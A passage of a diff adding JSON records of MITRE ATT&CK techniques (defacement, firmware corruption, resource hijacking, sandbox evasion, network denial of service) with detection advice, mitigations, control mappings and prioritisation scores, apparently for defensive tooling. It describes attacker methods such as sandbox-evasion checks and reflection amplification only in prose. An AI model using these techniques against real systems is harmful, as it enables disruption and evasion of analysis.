+        "description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)",
+        "url": "https://attack.mitre.org/techniques/T1491/002",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+        "platforms": [
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "File: File Creation",
+            "File: File Modification",
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1491",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1053",
+                "name": "Data Backup",
+                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                "url": "https://attack.mitre.org/mitigations/M1053"
+            }
+        ],
+        "cumulative_score": 0.19285714285714284,
+        "adjusted_score": 0.19285714285714284,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "11.1",
+            "11.2",
+            "11.3",
+            "11.4",
+            "11.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CM-2",
+            "CP-10",
+            "CP-2",
+            "CP-7",
+            "CP-9",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1495",
+        "name": "Firmware Corruption",
+        "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.",
+        "url": "https://attack.mitre.org/techniques/T1495",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Firmware: Firmware Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1046",
+                "name": "Boot Integrity",
+                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                "url": "https://attack.mitre.org/mitigations/M1046"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.3119047619047619,
+        "adjusted_score": 0.3119047619047619,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.8",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-8",
+            "IA-2",
+            "IA-7",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SI-2",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.2619047619047619,
+            "mitigation_score": 0.4909090909090909,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1496",
+        "name": "Resource Hijacking",
+        "description": "Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)",
+        "url": "https://attack.mitre.org/techniques/T1496",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.",
+        "platforms": [
+            "Containers",
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Flow",
+            "Process: Process Creation",
+            "Sensor Health: Host Status"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.07410567380952382,
+        "adjusted_score": 0.07410567380952382,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.023809523809523808,
+            "detection_score": 0.05
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.00029615
+    },
+    {
+        "tid": "T1497",
+        "name": "Virtualization/Sandbox Evasion",
+        "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n",
+        "url": "https://attack.mitre.org/techniques/T1497",
+        "tactics": [
+            "Defense Evasion",
+            "Discovery"
+        ],
+        "detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1497.001",
+                "name": "Virtualization/Sandbox Evasion: System Checks",
+                "url": "https://attack.mitre.org/techniques/T1497/001",
+                "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)",
+                "detection": "Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1497.002",
+                "name": "Virtualization/Sandbox Evasion: User Activity Based Checks",
+                "url": "https://attack.mitre.org/techniques/T1497/002",
+                "description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ",
+                "detection": "User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
+                "mitigations": []
+            },
+            {
+                "tid": "T1497.003",
+                "name": "Virtualization/Sandbox Evasion: Time Based Evasion",
+                "url": "https://attack.mitre.org/techniques/T1497/003",
+                "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\n\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)\n\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)\n\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)",
+                "detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
+                "mitigations": []
+            }
+        ],
+        "mitigations": [],
+        "cumulative_score": 0.44258250952380956,
+        "adjusted_score": 0.44258250952380956,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.009523809523809523,
+            "detection_score": 0.02
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.3330587
+    },
+    {
+        "tid": "T1497.001",
+        "name": "Virtualization/Sandbox Evasion: System Checks",
+        "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)",
+        "url": "https://attack.mitre.org/techniques/T1497/001",
+        "tactics": [
+            "Defense Evasion",
+            "Discovery"
+        ],
+        "detection": "Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1497",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10476190476190476,
+        "adjusted_score": 0.10476190476190476,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1497.002",
+        "name": "Virtualization/Sandbox Evasion: User Activity Based Checks",
+        "description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ",
+        "url": "https://attack.mitre.org/techniques/T1497/002",
+        "tactics": [
+            "Defense Evasion",
+            "Discovery"
+        ],
+        "detection": "User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1497",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1497.003",
+        "name": "Virtualization/Sandbox Evasion: Time Based Evasion",
+        "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\n\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)\n\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)\n\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)",
+        "url": "https://attack.mitre.org/techniques/T1497/003",
+        "tactics": [
+            "Defense Evasion",
+            "Discovery"
+        ],
+        "detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1497",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10476190476190476,
+        "adjusted_score": 0.10476190476190476,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1498",
+        "name": "Network Denial of Service",
+        "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).",
+        "url": "https://attack.mitre.org/techniques/T1498",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+        "platforms": [
+            "Azure AD",
+            "Containers",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Flow",
+            "Sensor Health: Host Status"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1498.001",
+                "name": "Network Denial of Service: Direct Network Flood",
+                "url": "https://attack.mitre.org/techniques/T1498/001",
+                "description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)",
+                "detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+                "mitigations": [
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    }
+                ]
+            },
+            {
+                "tid": "T1498.002",
+                "name": "Network Denial of Service: Reflection Amplification",
+                "url": "https://attack.mitre.org/techniques/T1498/002",
+                "description": "Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)\n\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)",
+                "detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+                "mitigations": [
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            }
+        ],
+        "cumulative_score": 0.1738095238095238,
+        "adjusted_score": 0.1738095238095238,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "7.6"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.12380952380952381,
+            "mitigation_score": 0.16363636363636364,
+            "detection_score": 0.08
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1498.001",
+        "name": "Network Denial of Service: Direct Network Flood",
